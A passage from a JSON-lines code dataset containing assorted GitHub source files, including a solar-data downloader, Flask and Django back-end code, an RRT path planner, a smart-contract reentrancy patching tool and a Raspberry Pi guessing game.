name\r\n class_index = yhat_class[0]\r\n class_probability = yhat_prob[0,class_index] * 100\r\n predict_names = out_encoder.inverse_transform(yhat_class)\r\n y_pred.append(predict_names)\r\n\r\n return y_true, y_pred, labels\r\n\r\nif __name__ == '__main__':\r\n #load model\r\n filename = 'finalized_model.sav'\r\n model = pickle.load(open(filename, 'rb'))\r\n y_true, y_pred, label = test(model)\r\n score = accuracy_score(y_true, y_pred)\r\n log(\"Accuracy Score on test data: \" + str(score))\r\n cm = confusion_matrix(y_true, y_pred, labels=label)\r\n np.savetxt(\"confusion_mat.csv\", cm, delimiter=\",\")","repo_name":"gaurav82692/Face_detection_stack_svm","sub_path":"Other Codes/visualization - Copy.py","file_name":"visualization - Copy.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"5467754802","text":"import matplotlib.pyplot as plt\nimport networkx as nx\nfrom dfs import undirected_cc\n\nsize = [40,30,30]\nprobs = [[0.1,0,0],[0,0.1,0],[0,0,0.1]]\n\n\n\nG= nx.stochastic_block_model(size,probs)\ncomponent = undirected_cc(G)\nprint (component)\npos = nx.spring_layout(G)\nnc = [component[v] for v in G.nodes()]\nnx.draw(G,pos,node_size=100,node_color=nc)\nplt.show()\n","repo_name":"lucatrevisan/lucatrevisan.github.io","sub_path":"code-samples/cc-test.py","file_name":"cc-test.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"6180185229","text":"import urllib\nfrom urllib.error import HTTPError, URLError\nfrom bs4 import BeautifulSoup , SoupStrainer\nimport re\nimport datetime\nfrom dateutil.relativedelta import 
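A possible follow-up for the record above (a sketch, not part of the original file; it assumes the confusion_mat.csv that the script writes):

import numpy as np
import matplotlib.pyplot as plt

# render the saved confusion matrix as a heatmap
cm = np.loadtxt('confusion_mat.csv', delimiter=',')
plt.imshow(cm, cmap='Blues')
plt.colorbar()
plt.xlabel('Predicted label')
plt.ylabel('True label')
plt.savefig('confusion_heatmap.jpg')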
relativedelta\nfrom sunpy.time import parse_time\nimport numpy as np\n\nsavedir_a = \"/Users/laurahayes/spaceweather_stuff/fun_stuff/final_ahead/\"\nsavedir_b = \"/Users/laurahayes/spaceweather_stuff/fun_stuff/final_behind/\"\n\nt1 = parse_time(\"2011-01-01\").datetime\nt2 = parse_time(\"2014-10-01\").datetime\ndate_list = [t1]\n\nfrom parfive import Downloader\n\nwhile t2>=t1:\n t1 = t1 + relativedelta(days=1)\n date_list.append(t1)\n\nbase_url = \"https://www.solarmonitor.org/data/\"\n\nurl_tests_b = [d.strftime(base_url+\"%Y/%m/%d/fits/strb/\") for d in date_list]\nurl_tests_a = [d.strftime(base_url+\"%Y/%m/%d/fits/stra/\") for d in date_list]\n\nbeacon_url_a = \"https://stereo-ssc.nascom.nasa.gov/data/beacon//ahead/secchi/img/euvi/\"\nbeacon_url_b = \"https://stereo-ssc.nascom.nasa.gov/data/beacon//behind/secchi/img/euvi/\"\n\n\nbeacon_test_a = [d.strftime(beacon_url_a+\"%Y%m%d/\") for d in date_list]\nbeacon_test_b = [d.strftime(beacon_url_b+\"%Y%m%d/\") for d in date_list]\n\n\ndef list_path_files(url_path, file_name):\n test = urllib.request.urlopen(url_path)\n soup = BeautifulSoup(test, features=\"lxml\")\n\n fits_links = []\n for link in soup.findAll('a'):\n if link.get('href') is not None and link.get('href').find(file_name) != -1:\n fits_links.append(url_path + link.get('href').split('/')[-1]) \n\n return fits_links\n\ndef find_file_times(file_name):\n if isinstance(file_name, (list, np.array)):\n t_list = []\n for i in range(len(file_name)):\n t = re.search('\\d{8}_\\d{6}', file_name[i]).group()\n tt = datetime.datetime.strptime(t, '%Y%m%d_%H%M%S')\n t_list.append(tt)\n return t_list\n else:\n\n t = re.search('\\d{8}_\\d{6}', file_name).group()\n tt = datetime.datetime.strptime(t, '%Y%m%d_%H%M%S')\n return tt\n\ndef get_urls_hours(beacon_tests):\n files_beacon = []\n for u in beacon_tests:\n print(u)\n try:\n urls = list_path_files(u, \"fts\")\n files_beacon.append(urls)\n except HTTPError:\n print(\"error\")\n files_beacon.append([])\n\n datess = [find_file_times(x) for x in files_beacon]\n hours = []\n for d in datess:\n try:\n hours.append(parse_time(d).strftime(\"%H\").astype(int))\n except:\n hours.append([])\n\n date_list_12 = [d + relativedelta(hours=12) for d in date_list]\n\n testy = []\n final_urls = []\n for i in range(len(datess)):\n if len(datess[i])>0:\n ind = np.argmin(np.abs(np.array(datess[i]) - date_list_12[i]))\n testy.append(datess[i][ind])\n final_urls.append(files_beacon[i][ind])\n else:\n testy.append([])\n final_urls.append([])\n return files_beacon, final_urls, testy\n\n# all_ahead, final_ahead, time_ahead = get_urls_hours(beacon_test_a)\n# all_behind, final_behind, time_behind = get_urls_hours(beacon_test_b)\n\ndef save_files():\n lala = {\"file_list\":files_beacon_ahead, \"final_urls\":final_urls, \"dates_final\":testy}\n lala2 = {\"file_list\":all_behind, \"final_urls\":final_behind, \"dates_final\":time_behind}\n with open(\"ahead_files.pkl\", \"wb\") as handle:\n pickle.dump(lala, handle)\n\n with open(\"behind_files.pkl\", \"wb\") as handle:\n pickle.dump(lala2, handle)\n\n\ndef download_files(file_list, savedir):\n dl = Downloader()\n for f in file_list:\n dl.enqueue_file(f, path=savedir)\n files = dl.download()\n\ndef download_files2(file_list, savedir):\n for f in file_list:\n if isinstance(f, str):\n fname = savedir + f.split(\"/\")[-1]\n urllib.request.urlretrieve(f, fname)\n else:\n print(f)\n\n\n# filess = []\n# for u in url_tests_a:\n# print(u)\n# try:\n# urls = list_path_files(u, \"fts.gz\")\n# filess.append(urls)\n# except HTTPError:\n# 
print(\"error\")\n# filess.append([])","repo_name":"hayesla/STEREO-AIA-stereoscopic-analysis","sub_path":"getting_beacon_data_tests.py","file_name":"getting_beacon_data_tests.py","file_ext":"py","file_size_in_byte":4014,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"16413009861","text":"import uuid\nfrom flask import request\nfrom flask.views import MethodView\nfrom flask_smorest import abort, Blueprint\nfrom db import stores\nfrom schemas import StoreSchema\n\nblp = Blueprint(\"stores\", __name__, description=\"Operations on Stores\")\n\n\n@blp.route(\"/store\")\nclass Store(MethodView):\n @blp.response(200, StoreSchema(many=True))\n def get(self):\n # return {\"stores\": list(stores.values())}\n return stores.values()\n\n @blp.arguments(StoreSchema)\n @blp.response(201, StoreSchema)\n def post(self, data):\n # data = request.get_json()\n\n # if \"name\" not in data:\n # abort(400, message=\"Bad Request, 'name' must be included\")\n\n for store in stores.values():\n if data[\"name\"] == store[\"name\"]:\n abort(400, message=\"This store name is already used.\")\n storeId = uuid.uuid4().hex\n # newStore = {\"name\": data[\"name\"], \"items\": []}\n # kwargs bcoz data is a str else data.copy() or just data\n store = {**data, \"store_id\": storeId}\n stores[storeId] = store\n # return store, 201\n return store\n\n\n@blp.route(\"/store/\")\nclass Store(MethodView):\n @blp.response(200, StoreSchema)\n def get(self, storeId):\n try:\n return stores[storeId]\n except KeyError:\n # return {\"error\": \"Store not found\"}, 404\n abort(400, message=\"Bad Request, 'name' must be included\")\n\n def delete(self, storeId):\n try:\n del stores[storeId]\n return {\"message\": \"Store deleted\"}\n except KeyError:\n abort(404, message=\"Store not found\")\n","repo_name":"1998tapan/StoreRepoFlask","sub_path":"resources/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71368163415","text":"def problem1(n):\n if n == 0:\n return 0 \n return n + problem1(n-1)\n# print(problem1(4))\n\n# 584321\n# 1\n# 2\n# 3\n# 4\n\ndef problem2(n,total=0):\n if n//10 == 0:\n total += n\n return total \n total+= n%10\n n=n//10\n return problem2(n,total)\nprint(problem2(584321))\n","repo_name":"KhuziamaR/Data-Structures-Algorithms-","sub_path":"DSA_Python/recursion/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28303033134","text":"from django.db import models\r\nfrom django.utils.translation import gettext_lazy as _\r\n\r\n\r\nclass Assistentes(models.Model):\r\n \"\"\"Os Assistentes de uma instancia.\r\n\r\n \"\"\"\r\n\r\n\r\n militante = models.ForeignKey(\r\n to='core.Militantes',\r\n verbose_name=_('militante'),\r\n on_delete=models.CASCADE,\r\n related_name='assistencias',\r\n )\r\n\r\n instancia = models.ForeignKey(\r\n to='core.Instancias',\r\n verbose_name=_('instancia'),\r\n on_delete=models.CASCADE,\r\n related_name='assistentes',\r\n )\r\n\r\n class Meta:\r\n verbose_name = _('assistente')\r\n verbose_name_plural = _('assistentes')\r\n\r\n def __str__(self):\r\n\r\n return 
f'{self.militante.apelido}'\r\n","repo_name":"lsd1953/mar-len","sub_path":"backend/core/models/assistentes.py","file_name":"assistentes.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
{"seq_id":"42826437215","text":"import logging\n\nlog = logging.getLogger(__name__)\n\n\ndef slicing(source, call, dfg, sequence, discarded):\n    # call is the CALL instruction\n    # source is the current instruction\n    slices = []\n    deps = set()\n    overs = set()\n    trv_stack = [source]\n    visited = {node: False for node in dfg.nodes()}\n    nodes = dfg.nodes()\n    # i.e. the SSTORE must always be discarded\n    discarded.add(source)\n\n    while len(trv_stack) > 0:\n        instr = trv_stack[0]\n        if visited[instr]:\n            visited[instr] = False\n            # after the post-order visit, emit in pre-order\n            slices.append(instr)\n            trv_stack.pop(0)\n        else:\n            visited[instr] = True\n            if instr == call:\n                raise RuntimeError('Violating data flow dependencies. CALL: {:#x}, lift: {:#x}'.format(call, instr))\n            if not nodes[instr]['instr'].reserved:\n                # enumerate the instructions related through the data flow\n                # suc is a successor\n                for suc in dfg[instr]:\n                    if suc not in discarded:\n                        break\n                # if the loop runs to completion, add this instruction to the discard set:\n                # if all of its successor instructions must be discarded, it must be discarded too\n                else:\n                    discarded.add(instr)\n\n            # dependence records the address-related instructions\n            # overwrite records the instructions that modify addresses\n            for dep in nodes[instr]['instr'].dependence:\n                if dep in sequence:\n                    # if the dependence also lies inside this sequence, keep it\n                    deps.add(dep)\n            overs.update(nodes[instr]['instr'].overwrite)\n            for pre in dfg.predecessors(instr):\n                # post-order traversal: revisiting a node means there is a cycle, so raise\n                if visited[pre]:\n                    raise RuntimeError('Error slicing, loop detected. lift: {:#x}, pre: {:#x}'.format(instr, pre))\n                trv_stack.insert(0, pre)\n    return slices, deps, overs\n\n\ndef lifting(sstore, call, dfg, trace, sliced, lifted, discarded):\n    # check whether (call, sstore) is in the recorded sequence\n    if (call, sstore) not in trace:\n        raise KeyError('Error tracing executed instructions from CALL to SSTORE. CALL: {:#x}, SSTORE: {:#x}'\n                       .format(call, sstore))\n    # the initial stack holds only the SSTORE instruction's position\n    lift_stack = [sstore]\n    # get the recorded trace set for (call, sstore)\n    sequence = trace[(call, sstore)]\n    # get the nodes of the data-flow graph\n    nodes = dfg.nodes()\n    #\n    lifts = set()\n    overwrites = set()\n    dependencies = set()\n    num = 0\n    while len(lift_stack) > 0:\n        num += 1\n        if num >= 10000:\n            raise RuntimeError('loop')\n        instr = lift_stack.pop(0)\n        # if nodes[call]['instr'].layer != nodes[instr]['instr'].layer:\n        #     raise RuntimeError('Violating control flow dependencies. CALL: {:#x}, lift: {:#x}'.format(call, instr))\n        name = nodes[instr]['instr'].name\n        num += 1\n\n        # raise if any of these call instructions is encountered in between\n        if name == 'CALL' or name == 'CALLCODE' or name == 'DELEGATECALL' or name == 'STATICCALL':\n            raise RuntimeError('Cannot lift CALL, CALLCODE, DELEGATECALL or STATICCALL. CALL: {:#x}, lift: {:#x}'\n                               .format(call, instr))\n\n        # start slicing\n        slices, deps, overs = slicing(instr, call, dfg, sequence, discarded)\n        # slices holds every instruction related to the current one, found by walking backwards from it\n        lifts.update(slices)\n        overwrites.update(overs)\n        if instr not in sliced:\n            sliced[instr] = slices\n        if instr not in lifted:\n            lifted[instr] = {call: sequence}\n        else:\n            if call not in lifted[instr]:\n                for pos in dict(lifted[instr]):\n                    if call in lifted[instr][pos]:\n                        break\n                    elif pos in sequence:\n                        lifted[instr][call] = sequence\n                        del lifted[instr][pos]\n                        break\n                else:\n                    lifted[instr][call] = sequence\n\n        for dep in deps:\n            lift_stack.insert(0, dep)\n    for instr in sequence.difference(lifts):\n        dependencies.update(nodes[instr]['instr'].dependence)\n    # the overwritten instructions must not include any dependency-related ones\n    if len(overwrites.intersection(dependencies)) > 0:\n        raise RuntimeError('Violating memory/storage dependencies. 
CALL: {:#x}, SSTORE: {:#x}'.format(call, sstore))\n\n\ndef set_report(report, call, sstore, msg):\n    report['Reentrancy'].append(\n        {\n            'callOffset': call,\n            'sStoreOffset': sstore,\n            'result': msg\n        }\n    )\n\n\ndef execute(dfg, trace, reentrancy, report):\n    sliced = {}\n    lifted = {}\n    discarded = set()\n    for vul in reentrancy:\n        call = vul[0]\n        sstore = vul[1]\n        old_sliced = sliced.copy()\n        old_lifted = lifted.copy()\n        old_discarded = discarded.copy()\n        try:\n            lifting(sstore, call, dfg, trace, sliced, lifted, discarded)\n        except Exception as e:\n            if str(e).strip('\\'') == 'Timeout.':\n                raise e\n            else:\n                sliced = old_sliced\n                lifted = old_lifted\n                discarded = old_discarded\n                set_report(report, call, sstore, str(e).strip('\\''))\n        else:\n            set_report(report, call, sstore, 'Done.')\n    nodes = dfg.nodes()\n    for instr in discarded:\n        nodes[instr]['instr'].discarded = True\n    patches = {}\n    for instr in lifted:\n        for pos in lifted[instr]:\n            if pos not in patches:\n                patches[pos] = {}\n            # in fact every entry of lifted maps call: sequence\n            # i.e. what gets stored is patches[call][instr]\n            patches[pos][instr] = sliced[instr]\n    return call, patches\n","repo_name":"eliQAQ/detect-vulnerable-contract","sub_path":"patch/patch.py","file_name":"patch.py","file_ext":"py","file_size_in_byte":5948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"}
{"seq_id":"4083999966","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nThis is a module for the data in the interactive Jupyter notebook.\n\"\"\"\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndata = pd.read_csv(\"./data/data_combined_final.csv\")\n\n\ndef get_data():\n    \"\"\"Function to get the data.\"\"\"\n    return data\n\ndef get_user_feedback(user_value, data, variable):\n    \"\"\"Return the user feedback from comparing the user's input value to the data in the dataset.\"\"\"\n    if user_value < data[variable].mean():\n        feedback = f\"You have a lower value than the average person. \\n The difference is {round(data[variable].mean() - user_value, 2)}.\"\n    elif user_value == data[variable].mean():\n        feedback = \"You have the same value as the average person.\"\n    else:\n        feedback = f\"You have a higher value than the average person. 
\\n The difference is {round(user_value - data[variable].mean(), 2)}.\"\n return feedback\n\ndef plot(dataset, userdata, plotted_variables):\n \"\"\"Function to plot a scatterplot of the data with the input of the user\n if the input plotted_variables is length is one the x-axis does not have any value \n and the y-axis is the value of the variable in plotted_variables\"\"\"\n\n if len(plotted_variables) == 1:\n variable = plotted_variables[0]\n y_data = dataset[variable]\n x_data = [0.5]*len(y_data)\n y_user = userdata[variable]\n x_user = 0.5\n \n else:\n x_data = dataset[plotted_variables[0]]\n y_data = dataset[plotted_variables[1]]\n x_user = userdata[plotted_variables[0]]\n y_user = userdata[plotted_variables[1]]\n \n\n # if the plotted is just one variable the x-axis does not have any value name and any values\n if len(plotted_variables) == 1:\n plt.figure(figsize=(10, 6))\n plt.xlabel(' ')\n plt.xticks([])\n plt.ylabel(plotted_variables[0])\n\n plt.scatter(x_data, y_data, color='pink', marker='o', s=100, alpha=0.5, label='Data')\n plt.scatter([x_user], [y_user], color='purple', marker='o', s=100, label=userdata['Name'])\n plt.axhline(y=y_data.mean(), color='black', linestyle='--', label=f\"Average {plotted_variables[0]}\")\n y_min, y_max = plt.ylim()\n x_min, x_max = plt.xlim()\n feedback = get_user_feedback(userdata[plotted_variables[0]], dataset, plotted_variables[0])\n plt.text(x_min + 0.56*(x_max-x_min), y_min + 0.4*(y_max-y_min), feedback, fontsize = 10)\n plt.legend()\n # if the plotted is two variables the x-axis and y-axis have values and value names\n else:\n plt.figure(figsize=(10, 6))\n\n plt.xlabel(plotted_variables[0])\n plt.ylabel(plotted_variables[1])\n\n plt.scatter(x_data, y_data, color='pink', marker='o', s=100, alpha=0.5, label='Data')\n plt.scatter([x_user], [y_user], color='purple', marker='o', s=100, label=userdata['Name'])\n plt.axhline(y=y_data.mean(), color='black', linestyle='--', label= f\"Average {plotted_variables[1]} \" )\n #plt.axvline(x=x_data.mean(), color='black', linestyle='--', label= f\"Average {plotted_variables[0]}\")\n y_min, y_max = plt.ylim()\n x_min, x_max = plt.xlim()\n feedback_x = get_user_feedback(userdata[plotted_variables[0]], dataset, plotted_variables[0])\n feedback_y = get_user_feedback(userdata[plotted_variables[1]], dataset, plotted_variables[1])\n #plt.text(x_min + 0.56*(x_max-x_min), y_min + 0.4*(y_max-y_min), feedback_x, fontsize = 10)\n plt.text(x_min + 0.56*(x_max-x_min), y_min + 0.3*(y_max-y_min), feedback_y, fontsize = 10)\n plt.legend()\n\n","repo_name":"heksaani/DataScienceProject","sub_path":"modules/data_module.py","file_name":"data_module.py","file_ext":"py","file_size_in_byte":3603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"30634528618","text":"import pygame\nimport random\nimport math\nimport time\nfrom node import Node\n\nscreen_width = 1000\nscreen_height = 1000\nscreen = pygame.display.set_mode((screen_width, screen_height))\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\nred = (255, 0, 0)\nblue = (0, 0, 255)\ngreen = (55, 155, 222)\npurple = (128, 0, 128)\n\ndef euclidean_distance(x1, y1, x2, y2):\n return math.sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)\n\nclass RRT:\n def __init__(self, start, goal, obstacles):\n self.start = Node(start[0], start[1])\n self.goal = Node(goal[0], goal[1])\n self.obstacles = obstacles\n self.nodes = [self.start]\n self.edges = []\n\n def generate_rrt(self, k, delta_t, max_paths):\n paths = []\n found_paths = 0\n 
shortest_path = None\n shortest_distance = math.inf\n\n while found_paths < max_paths:\n path = None\n for i in range(k):\n rand_node = self.random_state()\n nearest_node = self.nearest_neighbor(rand_node)\n u = self.select_input(rand_node, nearest_node)\n new_node = self.new_state(nearest_node, u, delta_t)\n if not self.collision(new_node, nearest_node):\n self.nodes.append(new_node)\n new_node.parent = nearest_node\n self.edges.append((nearest_node, new_node, u))\n pygame.draw.line(screen, blue, (nearest_node.x, nearest_node.y), (new_node.x, new_node.y), 2)\n pygame.display.update()\n if self.goal_reached(new_node):\n path = self.get_path(new_node)\n break\n if path is not None:\n paths.append(path)\n found_paths += 1\n self.exclude_nodes(path)\n\n # Draw the path in red\n for i in range(len(path) - 1):\n pygame.draw.line(screen, red, (path[i].x, path[i].y), (path[i + 1].x, path[i + 1].y), 3)\n pygame.display.update()\n\n # Calculate the path distance\n path_distance = sum(euclidean_distance(path[i].x, path[i].y, path[i+1].x, path[i+1].y) for i in range(len(path) - 1))\n if path_distance < shortest_distance:\n shortest_distance = path_distance\n shortest_path = path\n\n # Draw the shortest path in purple\n if shortest_path:\n for i in range(len(shortest_path) - 1):\n pygame.draw.line(screen, purple, (shortest_path[i].x, shortest_path[i].y),\n (shortest_path[i + 1].x, shortest_path[i + 1].y), 4)\n pygame.display.update()\n\n return paths\n\n def random_state(self):\n x = random.randint(0, screen_width)\n y = random.randint(0, screen_height)\n return Node(x, y)\n\n def nearest_neighbor(self, node):\n min_distance = math.inf\n nearest_node = None\n for n in self.nodes:\n distance = euclidean_distance(n.x, n.y, node.x, node.y)\n if distance < min_distance:\n min_distance = distance\n nearest_node = n\n return nearest_node\n\n def select_input(self, rand_node, nearest_node):\n return math.atan2(rand_node.y - nearest_node.y, rand_node.x - nearest_node.x)\n\n def new_state(self, nearest_node, u, delta_t):\n x = nearest_node.x + delta_t * math.cos(u)\n y = nearest_node.y + delta_t * math.sin(u)\n return Node(x, y)\n\n def line_intersection(self, p1, p2, q1, q2):\n def clockwiseLineSegment(A, B, C):\n return (C.y - A.y) * (B.x - A.x) > (B.y - A.y) * (C.x - A.x)\n if (p1 == q1) or (p1 == q2) or (p2 == q1) or (p2 == q2):\n return False\n return (clockwiseLineSegment(p1, q1, q2) != clockwiseLineSegment(p2, q1, q2)) and (clockwiseLineSegment(p1, p2, q1) != clockwiseLineSegment(p1, p2, q2))\n\n def collision(self, node, parent_node):\n for obstacle in self.obstacles:\n p1 = parent_node\n p2 = node\n rect_points = [\n (obstacle.left, obstacle.top),\n (obstacle.left, obstacle.bottom),\n (obstacle.right, obstacle.bottom),\n (obstacle.right, obstacle.top),\n ]\n for i in range(len(rect_points)):\n q1 = Node(rect_points[i][0], rect_points[i][1])\n q2 = Node(rect_points[(i + 1) % len(rect_points)][0], rect_points[(i + 1) % len(rect_points)][1])\n\n if self.line_intersection(p1, p2, q1, q2):\n return True\n return False\n\n def goal_reached(self, node):\n goal_radius = 50\n goalFlag = euclidean_distance(self.goal.x, self.goal.y, node.x, node.y) < goal_radius\n return goalFlag\n\n def get_path(self, node):\n path = []\n while node.parent is not None:\n path.append(node)\n node = node.parent\n path.append(self.start)\n path.reverse()\n return path\n\n def exclude_nodes(self, nodes_to_exclude):\n self.nodes = [node for node in self.nodes if node not in 
nodes_to_exclude]","repo_name":"dravendoom/RRTvisualize","sub_path":"rrt.py","file_name":"rrt.py","file_ext":"py","file_size_in_byte":5199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36856972132","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport autoslug.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('popolo', '__first__'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=512)),\n ('slug', autoslug.fields.AutoSlugField(editable=False)),\n ],\n options={\n 'verbose_name': 'Category',\n 'verbose_name_plural': 'Categories',\n },\n ),\n migrations.CreateModel(\n name='Fulfillment',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('percentage', models.PositiveIntegerField(default=0)),\n ('status', models.TextField(default=b'', blank=True)),\n ('description', models.TextField(default=b'', blank=True)),\n ],\n options={\n 'verbose_name': 'Fulfilment',\n 'verbose_name_plural': 'Fulfilments',\n },\n ),\n migrations.CreateModel(\n name='InformationSource',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('url', models.URLField()),\n ('display_name', models.CharField(max_length=512)),\n ('date', models.DateField()),\n ],\n options={\n 'verbose_name': 'Information Source',\n 'verbose_name_plural': 'Information Sources',\n },\n ),\n migrations.CreateModel(\n name='Milestone',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('date', models.DateField()),\n ('description', models.TextField()),\n ],\n options={\n 'ordering': ('date',),\n 'verbose_name': 'Milestone',\n 'verbose_name_plural': 'Milestones',\n },\n ),\n migrations.CreateModel(\n name='Promise',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=2048)),\n ('description', models.TextField(blank=True)),\n ('date', models.DateField(null=True, blank=True)),\n ('order', models.PositiveIntegerField(default=0)),\n ('category', models.ForeignKey(related_name='promises', to='promises.Category', null=True)),\n ('person', models.ForeignKey(to='popolo.Person')),\n ],\n options={\n 'ordering': ('order',),\n 'verbose_name': 'Promise',\n 'verbose_name_plural': 'Promises',\n },\n ),\n migrations.CreateModel(\n name='VerificationDocument',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('url', models.URLField()),\n ('display_name', models.CharField(max_length=512)),\n ('date', models.DateField()),\n ('promise', models.ForeignKey(related_name='verification_documents', to='promises.Promise', null=True)),\n ],\n options={\n 'verbose_name': 'Verification Document',\n 'verbose_name_plural': 'Verification Documents',\n },\n ),\n migrations.AddField(\n model_name='milestone',\n name='promise',\n field=models.ForeignKey(related_name='milestones', to='promises.Promise'),\n ),\n migrations.AddField(\n model_name='informationsource',\n name='promise',\n field=models.ForeignKey(related_name='information_sources', to='promises.Promise'),\n ),\n migrations.AddField(\n 
model_name='fulfillment',\n name='promise',\n field=models.OneToOneField(to='promises.Promise'),\n ),\n ]\n","repo_name":"ciudadanointeligente/ddah-promises","sub_path":"promises/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15867375642","text":"from sqlalchemy import Column, Integer, ForeignKey, String, Table\nfrom .Base import DeclarativeBase\n\n\n# association table between User and Event\nuser_has_event = Table(\n\t'User_has_Event',\n\tDeclarativeBase.metadata,\n\tColumn('username', String(200), ForeignKey('User.username')),\n\tColumn('event_id', Integer, ForeignKey('Event.event_id'))\n)","repo_name":"s-collins/seminars","sub_path":"services/etl/orm/User_has_Event.py","file_name":"User_has_Event.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7866425113","text":"import yaml\nimport os\nimport sys\n\ndata_path = '/eos/cms/store/user/cmsbuild/profiling/data/'\ncmssw = os.listdir(data_path)\ncmssw.sort(key = lambda x: (x.split('_')[1:4],10-len(x.split('_')),len(x)))\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--operator\", type=str, help=\"operator\", default=None)\nparser.add_argument(\"--workflow\", type=str, help=\"workflow\", default=None)\nparser.add_argument(\"--release\", type=str, help=\"CMSSW release\", default=None)\nargs = parser.parse_args()\n\nnew = args.release\nold = cmssw[cmssw.index(new)-1]\nnew_architecture = os.listdir(os.path.join(data_path,new))[0]\nold_architecture = os.listdir(os.path.join(data_path,old))[0]\nworkflow = args.workflow\noperator = args.operator\n\nresult_path = \"{0}/{1}/{2}/\".format(new,new_architecture,workflow)\n\nfor step in ['step3','step4','step5']:\n\t\n\tnew_data = os.path.join(data_path,new,new_architecture,workflow,'{}_TimeMemoryInfo.log'.format(step))\n\told_data = os.path.join(data_path,old,old_architecture,workflow,'{}_TimeMemoryInfo.log'.format(step))\n\n\tos.makedirs(result_path,exist_ok = True)\n\tif os.path.isfile(new_data) and os.path.isfile(old_data):\n\t\tos.system(\"source ./{8} {0}{2}/{3}/{6}/{7} {0}{4}/{5}/{6}/{7} > {1}{7}.txt\".format(\n\t\tdata_path,result_path,\n\t\told,old_architecture,\n\t\tnew,new_architecture,\n\t\tworkflow,step,operator))\n\n","repo_name":"xoqhdgh1002/cms-reco-profiling-web","sub_path":"jenkins/scripts/comparison/make_compare_data.py","file_name":"make_compare_data.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70729415895","text":"# Import appropriate libraries.\nimport time\nimport random\nfrom rpi_ws281x import PixelStrip, Color\nfrom Adafruit_LED_Backpack import SevenSegment\n\nLED_COUNT = 64 # Number of LED pixels.\nLED_PIN = 12 # GPIO pin connected to the pixels\nLED_FREQ_HZ = 800000 # LED signal frequency in hertz\nLED_DMA = 10 # DMA channel to use for generating signal\nLED_BRIGHTNESS = 10 # Set to 0 for darkest and 255 for brightest\nLED_INVERT = False # True to invert the signal (when using NPN\nLED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53\n\n# Prompt the user for their name and say hello.\nname = input(\"Hello! What is your name?\\n\")\nprint(\"Hello there \" + name + \"! 
I am thinking of a number between 1 and 100.\")\n\n# Prepare the game's variables.\nmy_number = random.randint(1, 100)\nguess_history = []\n\nstrip = PixelStrip(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL)\nstrip.begin()\n\ndef colorAll(strip, color):\n \"\"\"Wipe color across display a pixel at a time.\"\"\"\n for i in range(strip.numPixels()):\n strip.setPixelColor(i, color)\n strip.show()\n\n\nsegment = SevenSegment.SevenSegment(address=0x70)\n# Initialize the display. Must be called once before using the display.\nsegment.begin()\nsegment.set_digit(3, 0)\nsegment.set_digit(2, 1)\nsegment.write_display()\n# Begin the guessing loop with 10 tries.\nfor guess_count in range(1, 11):\n # Prompt the user for a number.\n valid_guess = False\n while not valid_guess:\n # Validate user input.\n try:\n number_guessed = int(input(\"Take a guess...\\n\"))\n valid_guess = True\n except ValueError:\n # The user didn't give us a number!\n print(\"Please provide a valid number.\")\n\n # Find out how close the user was to the real number.\n guess_difference = abs(my_number - number_guessed)\n\n # Add this guess to the guess history list.\n guess_history.append(number_guessed)\n\n # Check how close the guess is.\n if number_guessed < my_number and guess_difference > 10:\n colorAll(strip, Color(255, 0, 0))\n print(\"Your guess is very low. Try again.\")\n elif number_guessed > my_number and guess_difference > 10:\n colorAll(strip, Color(255, 0, 0))\n print(\"Your guess is very high. Try again.\")\n elif number_guessed < my_number and guess_difference <= 10:\n colorAll(strip, Color(255, 0, 0))\n print(\"You're close, but your guess is too low. Try again.\")\n elif number_guessed > my_number and guess_difference <= 10:\n colorAll(strip, Color(255, 0, 0))\n print(\"You're close, but 